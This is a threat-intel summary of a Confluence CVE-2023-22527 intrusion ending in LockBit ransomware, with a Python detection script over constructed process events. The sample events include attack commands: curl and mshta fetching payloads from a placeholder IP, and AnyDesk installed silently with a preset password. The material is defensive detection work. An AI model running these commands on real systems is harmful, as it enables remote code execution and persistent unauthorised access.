Intel Name: Confluence exploit leads to LockBit ransomware
Date of Scan: February 28, 2025
Impact: High
Summary: The attack began with the exploitation of CVE-2023-22527, a critical RCE vulnerability in Confluence, on a Windows server. The first signs of activity were system discovery commands such as net user and whoami. The attacker first tried to download AnyDesk with curl; that attempt failed, and the tool was later retrieved via mshta loading a remote HTA file that contained a Metasploit stager. After establishing command and control, the attacker installed AnyDesk with a preset password, ensuring persistent remote access.
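The chain above (web-app process spawning discovery commands, a curl download of AnyDesk, mshta fetching a remote HTA, AnyDesk installed with a preset password) maps to a handful of process-creation detections. The following is an added example, not code or telemetry from the intel record: it runs simple rules over constructed, Sysmon-style process events. The parent path (Confluence's bundled java.exe), the IP 203.0.113.10 and file names are invented for illustration, and the AnyDesk switches (`--install`, `--silent`, `--set-password`) are documented AnyDesk CLI options assumed here to be the ones an attacker would use.

```python
import ntpath
import re
from typing import Dict, List

# Constructed process-creation events in a simplified Sysmon-like shape.
# These are illustrative and are NOT logs from the incident described above.
SAMPLE_EVENTS = [
    {"parent": r"C:\Confluence\jre\bin\java.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c whoami"},
    {"parent": r"C:\Confluence\jre\bin\java.exe", "image": r"C:\Windows\System32\net.exe",
     "cmdline": "net user"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl -o C:\Users\Public\AnyDesk.exe http://203.0.113.10/AnyDesk.exe"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://203.0.113.10/update.hta"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Users\Public\AnyDesk.exe",
     "cmdline": r"AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Users\Public\AnyDesk.exe",
     "cmdline": "AnyDesk.exe --set-password"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},  # benign noise, should match nothing
]

REMOTE_URL = re.compile(r"https?://", re.I)
DISCOVERY_CMD = re.compile(r"\b(whoami|net\s+user)\b", re.I)
SHELLS = {"cmd.exe", "powershell.exe", "net.exe", "whoami.exe"}

# Rule name -> attack stage, used to summarise how much of the chain was seen.
STAGE_OF = {
    "confluence_spawned_shell": "initial_access",
    "discovery_command": "discovery",
    "curl_anydesk_download": "tool_transfer",
    "mshta_remote_hta": "execution",
    "anydesk_silent_install": "persistence",
    "anydesk_preset_password": "persistence",
}


def match_rules(ev: Dict[str, str]) -> List[str]:
    """Return the names of all rules a single process-creation event triggers."""
    parent_path = ev["parent"].lower()
    parent = ntpath.basename(parent_path)
    image = ntpath.basename(ev["image"]).lower()
    cmd = ev["cmdline"]
    hits = []

    # Confluence runs under a java.exe inside its install directory (assumption about
    # the deployment); that process should never spawn an interactive shell.
    if parent == "java.exe" and "confluence" in parent_path and image in SHELLS:
        hits.append("confluence_spawned_shell")
    if DISCOVERY_CMD.search(cmd):
        hits.append("discovery_command")
    # mshta pulling an HTA from a URL is the remote-stager pattern described above.
    if image == "mshta.exe" and REMOTE_URL.search(cmd):
        hits.append("mshta_remote_hta")
    if image == "curl.exe" and REMOTE_URL.search(cmd) and "anydesk" in cmd.lower():
        hits.append("curl_anydesk_download")
    if "anydesk" in image:
        if "--install" in cmd.lower():
            hits.append("anydesk_silent_install")
        if "--set-password" in cmd.lower():
            hits.append("anydesk_preset_password")
    return hits


def analyze(events: List[Dict[str, str]]) -> Dict[str, List[int]]:
    """Map each rule name to the indices of the events that triggered it."""
    results: Dict[str, List[int]] = {}
    for idx, ev in enumerate(events):
        for rule in match_rules(ev):
            results.setdefault(rule, []).append(idx)
    return results


def stages_observed(events: List[Dict[str, str]]) -> List[str]:
    """Distinct attack stages covered by the triggered rules, sorted for stable output."""
    return sorted({STAGE_OF[r] for r in analyze(events)})


if __name__ == "__main__":
    for rule, idxs in analyze(SAMPLE_EVENTS).items():
        print(f"{rule:26s} events={idxs}")
    print("stages:", stages_observed(SAMPLE_EVENTS))
```

The per-event rules are deliberately narrow; the value comes from correlating them on one host within a short window, since a web-app process spawning a shell followed by a remote-access tool being installed with a preset password is far more telling than either alert alone.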